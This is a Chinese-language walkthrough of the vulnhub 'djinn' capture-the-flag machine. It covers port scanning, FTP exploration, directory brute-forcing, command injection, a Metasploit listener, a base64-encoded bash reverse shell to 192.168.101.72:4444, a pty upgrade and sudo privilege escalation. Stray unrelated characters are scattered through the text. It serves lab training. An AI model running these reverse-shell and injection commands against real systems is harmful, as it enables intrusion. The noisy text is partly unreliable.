一、前言
通過大量vulnhub受控靶機積累一線攻防經(jīng)驗和技巧。
二觅玻、環(huán)境
靶機名稱:djinn
靶機難度:初學者/中級
目標:有兩個flag,user.txt and root.txt
攻擊機:kali linux控嗜,IP地址192.168.101.72
靶機:os-bytesec唁毒,IP地址192.168.101.156
三蒜茴、挑戰(zhàn)過程
1.掃描IP提供的IT服務——
nmap -v -A -sV -T4 -p 1-65535 192.168.101.156
ftp服務探索
貌似是一些登錄憑據(jù)
可能有機會拿反彈shell
web目錄爆破
根據(jù)文章提示,wish這里有命令注入點
監(jiān)聽準備——
msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.101.72
set lport 4444
exploit
準備個反彈shell命令——
bash -i >& /dev/tcp/192.168.101.72/4444 0>&1
轉(zhuǎn)成base64編碼——
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS43Mi80NDQ0IDA+JjE=
在頁面輸入框中提交——
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS43Mi80NDQ0IDA+JjE= | base64 -d | bash
拿到反彈shell浆西,不是root粉私,需要提權(quán),先轉(zhuǎn)成交互式shell——
python -c 'import pty; pty.spawn("/bin/bash")'
在/home/nitish/.dev下發(fā)現(xiàn)用戶名密碼文件
獲取user.txt flag
sudo提權(quán)-因管理員配置不當
獲取root flag
四近零、總結(jié)
風險點:
1.ftp未授權(quán)訪問
2.web os命令注入點
3.明文密碼存儲服務器
4.sudo權(quán)限配置濫用
五诺核、疑問點
1.【high】web OS命令注入點如何判斷?已解決【20220106】久信,看漏了窖杀,用burp看能更精準把握細節(jié),確實是命令注入裙士。
2.【median】num的猜解太隨意入客,應該是寫個腳本自動化爆破嘗試
參考鏈接
1.http://www.hackdig.com/04/hack-314667.htm